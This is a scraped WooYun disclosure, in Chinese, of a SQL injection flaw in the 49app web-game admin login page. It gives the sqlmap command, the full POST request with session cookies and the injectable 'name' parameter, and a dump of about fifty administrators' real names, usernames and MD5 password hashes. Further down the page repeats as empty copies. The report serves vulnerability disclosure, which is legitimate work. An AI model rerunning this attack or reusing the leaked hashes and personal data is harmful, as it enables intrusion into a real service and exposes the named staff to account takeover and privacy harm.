四九游网页游戏主站post注入泄露用户以及管理员订单号等等各种数据

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122988

漏洞标题：四九游网页游戏主站post注入泄露用户以及管理员订单号等等各种数据

漏洞作者：小龙

提交时间：2015-06-26 19:14

修复时间：2015-08-13 10:16

公开时间：2015-08-13 10:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-26：细节已通知厂商并且等待厂商处理中
2015-06-29：厂商已经确认，细节仅向厂商公开
2015-07-09：细节向核心白帽子及相关领域专家公开
2015-07-19：细节向普通白帽子公开
2015-07-29：细节向实习白帽子公开
2015-08-13：细节向公众公开

简要描述：

用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？
用户：尼玛，我的游戏币呢？

详细说明：

漏洞证明：

sqlmap.py -r c:\1.txt -D "adv" -T "tbl_admin" -C "email,realname,uid,uname,upass" --dump

[18:45:11] [INFO] retrieved: 系统账户
[18:45:11] [INFO] retrieved: 1
[18:45:11] [INFO] retrieved: admin
[18:45:11] [INFO] retrieved: 238d8f1586d01a3c0cc938eea2b1b9f7
[18:45:12] [INFO] retrieved:
[18:45:12] [INFO] retrieved: 超级admin
[18:45:12] [INFO] retrieved: 2
[18:45:12] [INFO] retrieved: 49app
[18:45:13] [INFO] retrieved: e3f3edc74c09e30e45f8633e47e90c03
[18:45:13] [INFO] retrieved:
[18:45:13] [INFO] retrieved: 聂亮
[18:45:13] [INFO] retrieved: 3
[18:45:13] [INFO] retrieved: niel
[18:45:14] [INFO] retrieved: b057fdc73f65f06dbb7cf0ee80716c17
[18:45:14] [INFO] retrieved:
[18:45:14] [INFO] retrieved: zcs
[18:45:14] [INFO] retrieved: 4
[18:45:15] [INFO] retrieved: zcs
[18:45:15] [INFO] retrieved: 9b447468ae74c8edce4ce461c9c324f7
[18:45:15] [INFO] retrieved:
[18:45:15] [INFO] retrieved: 罗海娟
[18:45:16] [INFO] retrieved: 5
[18:45:16] [INFO] retrieved: lhj
[18:45:16] [INFO] retrieved: 3ee5f7d5d0a38e97b56c91ee4bca104d
[18:45:17] [INFO] retrieved:
[18:45:17] [INFO] retrieved: 王彦
[18:45:17] [INFO] retrieved: 6
[18:45:17] [INFO] retrieved: wy
[18:45:18] [INFO] retrieved: 88f9de610da0dba9e2f2aa9a449713ae
[18:45:18] [INFO] retrieved:
[18:45:18] [INFO] retrieved: 江敏
[18:45:18] [INFO] retrieved: 7
[18:45:19] [INFO] retrieved: jm
[18:45:19] [INFO] retrieved: 9aec66b7de95dda12fdd3a7ac596fc0e
[18:45:19] [INFO] retrieved:
[18:45:19] [INFO] retrieved: 莫晓钧
[18:45:20] [INFO] retrieved: 8
[18:45:20] [INFO] retrieved: mxj
[18:45:20] [INFO] retrieved: 27d0289fde2477d8c676be97f9b36130
[18:45:20] [INFO] retrieved:
[18:45:20] [INFO] retrieved: 杨登元
[18:45:21] [INFO] retrieved: 9
[18:45:21] [INFO] retrieved: ydy
[18:45:21] [INFO] retrieved: dbede59b9283ee6c8ab8815c44e10d0c
[18:45:21] [INFO] retrieved:
[18:45:22] [INFO] retrieved: 赵乔
[18:45:22] [INFO] retrieved: 10
[18:45:22] [INFO] retrieved: zq
[18:45:22] [INFO] retrieved: 93bb3e5cf558308ee5c3f6acd5302c39
[18:45:23] [INFO] retrieved:
[18:45:23] [INFO] retrieved: 吴建文
[18:45:23] [INFO] retrieved: 11
[18:45:23] [INFO] retrieved: wjw
[18:45:24] [INFO] retrieved: eb4bf0686ca3821a5727f818afa6515a
[18:45:24] [INFO] retrieved:
[18:45:24] [INFO] retrieved: 郭龙
[18:45:25] [INFO] retrieved: 12
[18:45:25] [INFO] retrieved: gl
[18:45:25] [INFO] retrieved: c47b978acb9650296820a24d7923f885
[18:45:25] [INFO] retrieved:
[18:45:26] [INFO] retrieved: 蔡浩佳
[18:45:26] [INFO] retrieved: 13
[18:45:26] [INFO] retrieved: chj
[18:45:26] [INFO] retrieved: 0d25a3fc8e386d27b5771ce11ea8e689
[18:45:27] [INFO] retrieved:
[18:45:27] [INFO] retrieved: 吴晓纯
[18:45:27] [INFO] retrieved: 14
[18:45:27] [INFO] retrieved: wxc
[18:45:28] [INFO] retrieved: 4c8a5b973d3ed65f786c1b364b9f6e52
[18:45:28] [INFO] retrieved:
[18:45:28] [INFO] retrieved: 李华娟
[18:45:28] [INFO] retrieved: 15
[18:45:29] [INFO] retrieved: lihj
[18:45:29] [INFO] retrieved: 9e5d571d4a4e0eed49485b635f05e935
[18:45:29] [INFO] retrieved:
[18:45:29] [INFO] retrieved: 任志刚
[18:45:30] [INFO] retrieved: 16
[18:45:30] [INFO] retrieved: rzg
[18:45:30] [INFO] retrieved: f22d0d0847731205bbfc9c107e56429d
[18:45:30] [INFO] retrieved:
[18:45:31] [INFO] retrieved: 陈琛
[18:45:31] [INFO] retrieved: 17
[18:45:31] [INFO] retrieved: csheng
[18:45:31] [INFO] retrieved: e95921a7f82b19c15561e8e47f21b1f0
[18:45:32] [INFO] retrieved:
[18:45:32] [INFO] retrieved: 黄海高
[18:45:32] [INFO] retrieved: 18
[18:45:32] [INFO] retrieved: hhg
[18:45:33] [INFO] retrieved: d5012ad0c0f408aeb310af3c83799b5c
[18:45:33] [INFO] retrieved:
[18:45:33] [INFO] retrieved: 董土寿
[18:45:33] [INFO] retrieved: 19
[18:45:34] [INFO] retrieved: dts
[18:45:34] [INFO] retrieved: 9e14eb38f13ac924d3684c9884a469d6
[18:45:34] [INFO] retrieved:
[18:45:34] [INFO] retrieved: 大金总
[18:45:35] [INFO] retrieved: 20
[18:45:35] [INFO] retrieved: 49app888
[18:45:35] [INFO] retrieved: 3bcd1c139f01def8195841332932c724
[18:45:35] [INFO] retrieved:
[18:45:44] [INFO] retrieved: 邓辉旋
[18:45:45] [INFO] retrieved: 21
[18:45:45] [INFO] retrieved: denghx
[18:45:45] [INFO] retrieved: 9f63a6ab6d808c73816a503dfae55596
[18:45:45] [INFO] retrieved:
[18:45:46] [INFO] retrieved: 小金总
[18:45:46] [INFO] retrieved: 22
[18:45:46] [INFO] retrieved: jzj
[18:45:46] [INFO] retrieved: 08faa608f589e963ba47199b58ae8646
[18:45:47] [INFO] retrieved:
[18:45:47] [INFO] retrieved: 彭键浩
[18:45:47] [INFO] retrieved: 23
[18:45:47] [INFO] retrieved: pengjh
[18:45:48] [INFO] retrieved: 6197ad69f5c5c971f3b948b51aa0d2f7
[18:45:48] [INFO] retrieved:
[18:45:48] [INFO] retrieved: 刘超
[18:45:48] [INFO] retrieved: 24
[18:45:48] [INFO] retrieved: liuzhao
[18:45:49] [INFO] retrieved: 764a587c7aedb7cc580be006d00a52c5
[18:45:49] [INFO] retrieved:
[18:45:49] [INFO] retrieved: 潘总
[18:45:50] [INFO] retrieved: 25
[18:45:50] [INFO] retrieved: phw
[18:45:50] [INFO] retrieved: b7d74f9e586dda4316b5b649943ec736
[18:45:50] [INFO] retrieved:
[18:45:51] [INFO] retrieved: 百米生活
[18:45:51] [INFO] retrieved: 26
[18:45:51] [INFO] retrieved: bmsh
[18:45:51] [INFO] retrieved: 4cce8579f1bc24992e09ed415c5a44df
[18:45:51] [INFO] retrieved:
[18:45:52] [INFO] retrieved: 陈丹霞
[18:45:52] [INFO] retrieved: 27
[18:45:52] [INFO] retrieved: chendx
[18:45:52] [INFO] retrieved: fe5cccbbf7cc0178ee330d82ebcf57f3
[18:45:53] [INFO] retrieved:
[18:45:53] [INFO] retrieved: 叶智伟
[18:45:53] [INFO] retrieved: 28
[18:45:53] [INFO] retrieved: yezhiwei
[18:45:54] [INFO] retrieved: 1402081cfd2656d92e110b0e11b19ca7
[18:45:54] [INFO] retrieved:
[18:45:54] [INFO] retrieved: 曹卓君
[18:45:54] [INFO] retrieved: 29
[18:45:55] [INFO] retrieved: caozj
[18:45:55] [INFO] retrieved: 8a0377dd06ffabc978a9008160fec853
[18:45:55] [INFO] retrieved:
[18:45:55] [INFO] retrieved: 王彦
[18:45:56] [INFO] retrieved: 30
[18:45:56] [INFO] retrieved: wangy
[18:45:56] [INFO] retrieved: 8f0367fa38702eec247d14864cf8260e
[18:45:56] [INFO] retrieved:
[18:45:57] [INFO] retrieved: 刘丽
[18:45:57] [INFO] retrieved: 31
[18:45:57] [INFO] retrieved: liul
[18:45:57] [INFO] retrieved: 77659db0a43e524e347e6be1f65d0320
[18:45:58] [INFO] retrieved:
[18:45:58] [INFO] retrieved: 吴晓瑜
[18:45:58] [INFO] retrieved: 32
[18:45:58] [INFO] retrieved: wuxy
[18:45:59] [INFO] retrieved: c5f85b716f7ccdb2c2efbfacacd78ff1
[18:45:59] [INFO] retrieved:
[18:45:59] [INFO] retrieved: 王燊
[18:45:59] [INFO] retrieved: 33
[18:46:00] [INFO] retrieved: wangs
[18:46:00] [INFO] retrieved: 3b9a52b31f6ee564096f212bdbca311e
[18:46:00] [INFO] retrieved:
[18:46:00] [INFO] retrieved: 陈巧
[18:46:01] [INFO] retrieved: 34
[18:46:01] [INFO] retrieved: chenq
[18:46:01] [INFO] retrieved: c8d62828e06c08f8627b8327bec21ba4
[18:46:01] [INFO] retrieved:
[18:46:02] [INFO] retrieved: 王平
[18:46:02] [INFO] retrieved: 35
[18:46:02] [INFO] retrieved: wangp
[18:46:02] [INFO] retrieved: 3d0486699b189f6092bc6f74066fdc3b
[18:46:03] [INFO] retrieved:
[18:46:03] [INFO] retrieved: 胡彧
[18:46:03] [INFO] retrieved: 36
[18:46:03] [INFO] retrieved: huy
[18:46:04] [INFO] retrieved: a47ff49af6d1ca0cc19e559c5c4361c1
[18:46:04] [INFO] retrieved:
[18:46:04] [INFO] retrieved: 马俊斌
[18:46:04] [INFO] retrieved: 37
[18:46:04] [INFO] retrieved: majb
[18:46:05] [INFO] retrieved: d51f3bf110ea9832a698ae6a8e9dfae8
[18:46:05] [INFO] retrieved:
[18:46:05] [INFO] retrieved: 庞贤
[18:46:06] [INFO] retrieved: 38
[18:46:06] [INFO] retrieved: pangx
[18:46:06] [INFO] retrieved: 08190e1cd778ac092abbd3752ca294d2
[18:46:06] [INFO] retrieved:
[18:46:07] [INFO] retrieved: 向东华
[18:46:07] [INFO] retrieved: 39
[18:46:07] [INFO] retrieved: xiangdh
[18:46:07] [INFO] retrieved: 8520f2e28591184f522b6a62ad74dcf1
[18:46:08] [INFO] retrieved:
[18:46:08] [INFO] retrieved: 李韬
[18:46:08] [INFO] retrieved: 40
[18:46:08] [INFO] retrieved: lit
[18:46:09] [INFO] retrieved: fe72ca05f4e1f7c49f5e909380600aac
[18:46:09] [INFO] retrieved:
[18:46:09] [INFO] retrieved: 马晓远
[18:46:09] [INFO] retrieved: 41
[18:46:10] [INFO] retrieved: mxy
[18:46:10] [INFO] retrieved: 22a5bed935f39ee4af007ea09d511cfa
[18:46:10] [INFO] retrieved:
[18:46:10] [INFO] retrieved: 吴敏仪
[18:46:10] [INFO] retrieved: 42
[18:46:11] [INFO] retrieved: wumy
[18:46:11] [INFO] retrieved: 6d8dc2d9fba7123caabeb68b3d01f19d
[18:46:11] [INFO] retrieved:
[18:46:11] [INFO] retrieved: 肖清游
[18:46:12] [INFO] retrieved: 43
[18:46:12] [INFO] retrieved: xiaoqy
[18:46:12] [INFO] retrieved: 9d5f976a9172062620dddf26f5c7491e
[18:46:12] [INFO] retrieved:
[18:46:13] [INFO] retrieved: 吴吕翠
[18:46:13] [INFO] retrieved: 44
[18:46:13] [INFO] retrieved: wulc
[18:46:14] [INFO] retrieved: aea2d59b07079e18efb52874d2de8cc9
[18:46:14] [INFO] retrieved:
[18:46:14] [INFO] retrieved: 吴吕翠
[18:46:14] [INFO] retrieved: 45
[18:46:14] [INFO] retrieved: wulvcui
[18:46:15] [INFO] retrieved: f10ebc23b1c18da604107060ec54a6fe
[18:46:15] [INFO] retrieved:
[18:46:15] [INFO] retrieved: 方銮双
[18:46:15] [INFO] retrieved: 46
[18:46:16] [INFO] retrieved: fangls
[18:46:16] [INFO] retrieved: e88e64c89e91cb968715fd33b66f314c
[18:46:16] [INFO] retrieved:
[18:46:16] [INFO] retrieved: 宋春梅
[18:46:17] [INFO] retrieved: 47
[18:46:17] [INFO] retrieved: songcm
[18:46:17] [INFO] retrieved: 68395e545f59cd0b4efee6454229db44
[18:46:17] [INFO] retrieved:
[18:46:18] [INFO] retrieved: 周勇杰
[18:46:18] [INFO] retrieved: 48
[18:46:18] [INFO] retrieved: zhouyongjie
[18:46:18] [INFO] retrieved: 869554558aa35d5b4cdad789fca3c6b3
[18:46:19] [INFO] retrieved:
[18:46:19] [INFO] retrieved: 鲁立
[18:46:19] [INFO] retrieved: 49
[18:46:19] [INFO] retrieved: lul
[18:46:20] [INFO] retrieved: f062e7a2f76d38c8b197e9b8158d47d4
[18:46:20] [INFO] retrieved:
[18:46:20] [INFO] retrieved: 俞丽娟
[18:46:20] [INFO] retrieved: 51
[18:46:21] [INFO] retrieved: yulj
[18:46:21] [INFO] retrieved: dd25e8055eb55974b4564ddc7607b5e6
[18:46:21] [INFO] retrieved:
[18:46:21] [INFO] retrieved: 李婷婷
[18:46:22] [INFO] retrieved: 52
[18:46:22] [INFO] retrieved: ltt
[18:46:22] [INFO] retrieved: 161f3ce513cae5570e3b7e908d68efd9

1.txt 的内容：

POST /index.php/login/process/ HTTP/1.1
Host: spreadadmin.49app.com
Proxy-Connection: keep-alive
Content-Length: 33
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://spreadadmin.49app.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://spreadadmin.49app.com/index.php/login?backurl=%2F
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 49app_id=cbe64f495ce650094df669b2a7e6c4c9; ci_session=a%3A7%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2237c93820283e190f56043f840d4a735c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22116.19.60.45%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+MetaSr+1.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435274322%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22username%22%3Bs%3A10%3A%22q189837992%22%3Bs%3A3%3A%22uid%22%3Bi%3A20902485%3B%7D2c00165b22eb7c26a036998b9bd659ee; VerifySign=AUUJXwAqB0RUEAVcVGBXNlYECTZaPF1RUwlXNFAZA3cJSAd%2FWDwGVFc%2FAGRTFFE0WR8GAwlsVTVUd1FlADhSPAEwCWgAawc3VGwFP1RnV2xWYQk%2BWjddN1NjV2BQOAM%2BCW0HZFg8BmdXagBuU29RYlk4BmYJMFUwVDE%3D; 49APP_USER=%7B%22UserName%22%3A%22q189837992%22%2C%22Uid%22%3A20902485%2C%22Timestamp%22%3A1435274322%2C%22LogRefer%22%3A%22http%3A%2F%2Fwww.49app.com%2F%22%7D; YY_49APP=204b5638a7a580505937428ee3a54b0a; ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220f538be0901d2960dbf177075755b0c5%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22116.19.60.45%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+MetaSr+1.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1435274404%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D6a9ab8f6db7e6abb96dca809315f53e5ed160f46
name=aaa&password=aaa&backurl=%2F

name参数存在注入，密码倒是不会，因为传输过程中password参数被转化成了加密格式
所以只能把name参数带进去了。。

http://spreadadmin.49app.com/index.php/login?backurl=%2F

修复方案：

1:过滤参数或者将用户名也明文传输

版权声明：转载请注明来源小龙@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-06-29 10:14

厂商回复：

非常感谢白帽子童鞋 @小龙，技术正常紧急修复中

漏洞评价：

2015-06-26 19:32 | Jinone ( 普通白帽子 | Rank:128 漏洞数:28 | 安全盒子招人ing 有意请私信)

说好的肾6那
2015-06-26 23:16 | DeadSea ( 实习白帽子 | Rank:86 漏洞数:28 | 静心)

开始SQL了啊
2015-06-27 00:07 | 小龙 ( 普通白帽子 | Rank:1208 漏洞数:316 | 乌云有着这么一群人，在乌云学技术，去某数...)

@上海49游数据库还有一些adder的表，member,包括pay的表，phone，email的表我想你自己知道是啥把，请慎重给分祝愿49游生意红红火火，比天书世界火一百倍(´･ω･`) 数据库一共四个

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122988

漏洞标题：四九游网页游戏主站post注入泄露用户以及管理员订单号等等各种数据

相关厂商：49you.com

漏洞作者：小龙

提交时间：2015-06-26 19:14

修复时间：2015-08-13 10:16

公开时间：2015-08-13 10:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小龙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0122988

漏洞标题：四九游网页游戏主站post注入泄露用户以及管理员订单号等等各种数据

相关厂商：49you.com

漏洞作者： 小龙

提交时间：2015-06-26 19:14

修复时间：2015-08-13 10:16

公开时间：2015-08-13 10:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0122988"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小龙@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小龙

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小龙@乌云